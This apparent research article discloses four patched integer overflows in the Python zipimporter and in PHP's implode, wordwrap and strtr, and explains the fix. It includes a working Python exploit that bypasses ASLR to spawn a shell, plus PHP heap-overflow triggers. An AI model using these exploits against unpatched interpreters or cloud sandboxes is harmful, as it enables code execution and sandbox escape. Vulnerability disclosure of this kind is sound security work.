Introduction
Security vulnerabilities in language interpreters are considered more critical than bugs in software in general because they could break the trust for trusted computing base (TCB) as Ken Thompson pointed on his famous turing award lecture in 1984 [1]. For instance, these vulnerabilities break the security guarantee provided by security analysis tools or code auditing while the most of such analyses grounded on the trust for language interpreters. Instead of starting the security analysis from low-level parts of a machine, the analysis sets the interpreter as a root of trust, then performs static and dynamic analyses over the language abstraction to test software against bugs. Although such analyses can catch bugs in the code level, they cannot detect vulnerabilities underlying the interpreter. These hideous vulnerabilities, if any of these is exploited, break the trust guaranteed by the analyses performed over the code.
Another example remarkably affected by such bugs is the language interpreter sandbox in cloud providers. Cloud providers such as Google App Engine modified the language interpreter to create sandbox by only providing restricted environment (e.g., that cannot execute shell command or cannot interact with OS-related functions) to the guest of the cloud. The main purpose of having such sandboxes is to isolate the guest and limit the resource while not running the code in the virtual machines, which is costly in performance. Nonetheless, since the restrictions of the sandbox is based on trusted language interpreters, the isolation cannot be guaranteed if a vulnerability in the interpreter is exploited by an attacker.
In this article, we demostrate four integer overflow vulnerabilities, which are found by our recent research work [2], in Python and PHP language interpreters that can be exploited for control-flow hijacking. These vulnerabilities undermine the trust of language interpreters, thus break security guarantees on language runtime sandbox. We note that all these vulnerabilities disclosed here have been patched already in the upstream release version of Python and PHP.
Python zipimporter heap overflow(CVE-2016-5636)
zipimport
$ python
>>> import sys
>>> sys.path
[..., '/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg', ...]
$ file /usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg
/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg: Zip archive data, at least v2.0 to extract
sys.path
, search paths for modules, contains not only directories, but also
ZIP files. zipimport
module provides the way to import Python modules from
ZIP-format archives.
Vulnerability
// zipimporter.c
bytes_size = compress == 0 ? data_size : data_size + 1;
if (bytes_size == 0)
bytes_size++;
raw_data = PyBytes_FromStringAndSize((char *)NULL, bytes_size);
The vulnerability exists in ZIP file decoder of zipimporter
module.
data_size
, extracted from ZIP file, is not properly validated. If data_size
is 0xffffffff(-1) and compress
is non-zero, then bytes_size
, buffer size
for storing file data, becomes one. Later, Python reads a file to this
small buffer and heap overflow is occurred.
Bypass ASLR
>>> hex(id('a'))
'0x7f6c2c677710'
To achieve arbitrary code execution, we need to bypass ASLR. Fortunately,
Python uses a memory address as an id
of an objet. By using built-in id
, we
can bypass ASLR.
Proof of Concept
#!/usr/bin/env python2
import os
import zipimport
import zipfile
import struct
FILE = 'payload'
ZIP = 'import.zip'
DIR = 'sh'
if not os.path.exists(DIR):
os.mkdir(DIR)
addr = id("A")
libc_base = addr
system_addr = libc_base + 0x46640
print("LIBC_BASE : %x" % libc_base)
bin_sh = os.path.join(DIR, struct.pack('<Q', libc_base + 0x7b1998).replace("\x00", ""))
with open(bin_sh, 'w') as f:
f.write("/bin/sh")
os.chmod(bin_sh, 0777)
os.putenv("PATH", os.getenv("PATH") + ":" + DIR)
some_string_obj = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
some_string_obj += "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZaaaabbbbccccddddeeeeffff"
some_string_obj += "gggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvv"
some_string_obj += "wwwwxxxxyyyyzzzz"
some_string_obj += "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
some_string_obj += "QQQQRRRRSSSSTTTTUUUU"
print("%x" % id(some_string_obj))
# func addr here
some_string_obj += struct.pack('<Q', system_addr)
a = some_string_obj
addr = id(a)
addrs = []
for i in xrange(8):
addrs.append(addr % 0x100)
addr /= 0x100
addrs_2 = map(lambda x:chr(x), addrs)
print(addrs_2)
print("%x" % id(some_string_obj))
# generate input
with open(FILE, 'wb') as f:
payload = ("aaaa"+("".join(addrs_2)) * 128)
f.write(payload)
zf = zipfile.PyZipFile(ZIP, mode='w')
zf.write(FILE)
zf.close()
importer = zipimport.zipimporter(ZIP)
f = list(importer._files[FILE])
f[1] = 1 # compress
f[2] = -1 # file size
importer._files[FILE] = tuple(f)
importer.get_data(FILE)
Google App Engine
Since zipimport
is an essential module for Python, it is in the whitelist of
Google App Engine's Python sandbox. Consequently, the
attacker can exploit this vulnerability to break the sandbox. We reported this
issue to Google upon its discovery.
Integer Overflow in PHP
In PHP v7.0.2, strings are generally allocated by zend_string_alloc()
function.
// zend/zend_string.h
static zend_always_inline zend_string *zend_string_alloc(size_t len, int persistent)
{
zend_string *ret = (zend_string *)pemalloc(ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(len)), persistent);
GC_REFCOUNT(ret) = 1;
//..
ZSTR_LEN(ret) = len;
return ret;
}
The function is a wrapper of pemalloc
. The function internally invokes
pemalloc(size)
to allocate the memory, with size value with respect to
len variable. The function itself seems to not to have any bug, however,
using the function with arithmetic expression as the length argument can create
a vulnerability.
Vulnerability example in php_implode
// ext/standard/string.c
PHPAPI void php_implode(const zend_string *delim, zval *arr, zval *return_value)
{
// ...
str = zend_string_alloc(len + (numelems - 1) * ZSTR_LEN(delim), 0);
// ...
}
A vulnerable example is in the php_implode
function.
The function invokes zend_string_alloc
with the following arithmetic expression
as the length argument: len
+ (numelems
- 1) * ZSTR_LEN(delim)
An integer overflow can arise in the expression if the values are carefully
manimulated. For instance, in case when the size of string delim
is 65,536,
number of elements are 65,536, and the length of the string len
is 65,536,
then the size value will be zero (65536 + 65535 * 65536) = 4294967296 = 0
The following code shows the proof-of-concept (PoC) that exploits the vulnerability.
<?php
$arr = [];
for($i=0;$i<65536; ++$i) {
$arr[$i]= "aa";
}
$text1 = str_repeat("ABCD", 16384);
// Changing ABCD into other values will alter %eax and %ecx.
$str = implode($text1, $arr);
?>
Exploiting the vulnerability requires the size of strings for the arguments to be matched to overflow, as mentioned above. First, we build the string $text1 to be 65,536 sized string (ABCD is repeated 16,384 times).
We searched for similar cases (i.e., use of zend_string_alloc with multiplication
expression) in ext/standard/string.c
file, we found three of such cases, and
successfully create control-flow hijacking exploits for all cases.
php_wordwrap()
// ext/standard/string.c
PHP_FUNCTION(wordwrap)
{
// ...
// allocate string into newtext variable
if (linelength > 0) {
chk = (size_t)(ZSTR_LEN(text)/linelength + 1);
newtext = zend_string_alloc(chk * breakchar_len + ZSTR_LEN(text), 0);
alloced = ZSTR_LEN(text) + chk * breakchar_len + 1;
} else {
chk = ZSTR_LEN(text);
alloced = ZSTR_LEN(text) * (breakchar_len + 1) + 1;
newtext = zend_string_alloc(ZSTR_LEN(text) * (breakchar_len + 1), 0);
}
// ...
// do multiple memcpy()...
if(...) {
memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart + breakchar_len);
memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart);
memcpy(ZSTR_VAL(newtext) + newtextlen, breakchar, breakchar_len);
memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart);
}
}
In the code, wordwrap()
allocates memory for new string by calling
zend_string_alloc
, with size argument as either of
chk
* breakchar_len
+ ZSTR_LEN(text)
or
ZSTR_LEN(text)
* (breakchar_len
+ 1).
The expression for the size argument can cause a condition of integer overflow.
In the second expression (ZSTR_LEN(text)
* (breakchar_len
+ 1)),
if the attacker forges the argument as 65,536 (2^16) character string for text,
and 65,535 (2^16 - 1) character string as breakchar, then
the resulting value will be (65,536) * (65,535 + 1) = 4294967296 = 0.
In such a case, zend_string_alloc
will allocate a zero sized buffer
(actually, a little bigger than zero because it is aligned by Zend object size),
and then subsequnt memcpy
will overwrite the heap buffer.
Proof-of-Concept code for triggering the vulnerability is in the following.
<?php
$text1 = str_repeat("A", 65536);
$text2 = str_repeat("B", 65536 - 1);
$newtext = wordwrap($text1, -1, $text2);
?>
By configuring the length of string arguments as 65,536 and 65,535 respectively,
the subsequent memcpy
inside wordwrap function will overflow the heap objects.
php_str_to_str_ex()
// ext/standard/string.c
static zend_string *php_str_to_str_ex(zend_string *haystack,
char *needle, size_t needle_len, char *str, size_t str_len, zend_long *replace_count)
{
//...
// count is the value that how many times needle appears in the haystack
new_str = zend_string_alloc(count * (str_len - needle_len) + ZSTR_LEN(haystack), 0);
//...
e = s = ZSTR_VAL(new_str);
end = ZSTR_VAL(haystack) + ZSTR_LEN(haystack);
for (p = ZSTR_VAL(haystack); (r = (char*)php_memnstr(p, needle, needle_len, end)); p = r + needle_len) {
memcpy(e, p, r - p);
e += r - p;
memcpy(e, str, str_len);
e += str_len;
(*replace_count)++;
}
if (p < end) {
memcpy(e, p, end - p);
e += end - p;
}
//...
}
The variable new_str
is allocated with zend_string_alloc
, with the
multiplicative expression: count
* (str_len
- needle_len
) + ZSTR_LEN(haystack)
.
If the value is overflowed, thus allocates smaller size than the expected one,
the following memcpy in the for loop causes heap overflow.
The PoC code for exploiting the bug is in the following.
<?php
$a = str_repeat('A', 65536);
$b = str_repeat('ABCD', 32768);
// Changing 'ABCD' into other value alters %eip to arbitrary value.
$c = array('AA'=> $b);
strtr($a , $c);
?>
The haystack becomes a string with the length of 65,536,
the needle
is 'AA', so the count
is 32,768 ('A'*65,536 can be splitted into
32,768 of 'AA's), and str_len
is 131,072 ('ABCD' * 32768 = 131071).
Therefore, the resulting expression in the zend_string_alloc
is
32768 * (131072 - 2) + 65536 = 4294967296 = 0.
Since the string object is allocated as size zero,
running memcpy
over the object in the for-loop will trigger
heap overflow.
A Patch: zend_string_safe_alloc()
We reported those three vulnerability to PHP, and all of the bugs are
patched in PHP v7.0.4. The patches were very simple, just changing zend_string_alloc
to zend_string_safe_alloc
. Let's take a look how this can prevent the integer
overflow bugs.
//zend_string.h
static zend_always_inline zend_string *zend_string_safe_alloc(size_t n, size_t m, size_t l, int persistent)
{
// calls _safe_malloc
zend_string *ret = (zend_string *)safe_pemalloc(n, m, ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(l)), persistent);
GC_REFCOUNT(ret) = 1;
//...
ZSTR_LEN(ret) = (n * m) + l;
return ret;
}
// zend_alloc.c
// _safe_malloc calls zend_safe_address to check if n*m overflows.
ZEND_API void* ZEND_FASTCALL _safe_malloc(size_t nmemb, size_t size, size_t offset)
{
// calls safe_address
return pemalloc(safe_address(nmemb, size, offset), 1);
}
static zend_always_inline size_t safe_address(size_t nmemb, size_t size, size_t offset)
{
int overflow;
size_t ret = zend_safe_address(nmemb, size, offset, &overflow);
if (UNEXPECTED(overflow)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nmemb, size, offset);
return 0;
}
return ret;
}
// zend_multiply.h
static zend_always_inline size_t zend_safe_address(size_t nmemb, size_t size, size_t offset, int *overflow)
{
size_t res = nmemb;
size_t m_overflow = 0;
__asm__ ("mull %3\n\taddl %4,%0\n\tadcl $0,%1"
: "=&a"(res), "=&d" (m_overflow)
: "%0"(res),
"rm"(size),
"rm"(offset));
if (UNEXPECTED(m_overflow)) {
*overflow = 1;
return 0;
}
*overflow = 0;
return res;
}
Contrary to zend_string_alloc
that gets multiplicative expression as the
argument, zend_string_safe_alloc
gets the factors of the size, and internally
apply the multiplication to calculate the size. In particular, the function
zend_string_safe_alloc
calls _safe_malloc
, and inside of that,
the function calls safe_address
, which will finally call zend_safe_address
.
In the function zend_safe_address
, the assembly code placed in the middle
actually check if the multiplication of the factor generates integer overflow.
If overflow arise, the allocation will fail with error message
(at the code of if (UNEXPECTED(overflow))
in safe_address()
).
Therefore, these integer overflow vulnerabilities no longer exist in the
latest version of PHP.
[1] Thompson, K. (1984). Reflections on trusting trust. Communications of the ACM, 27(8), 761-763.
[2] Yun, Insu, et al. (2016). APISAN: Sanitizing API Usages through Semantic Cross-checking, In Proceedings of the 25th USENIX Security Symposium (Security), Austin, TX.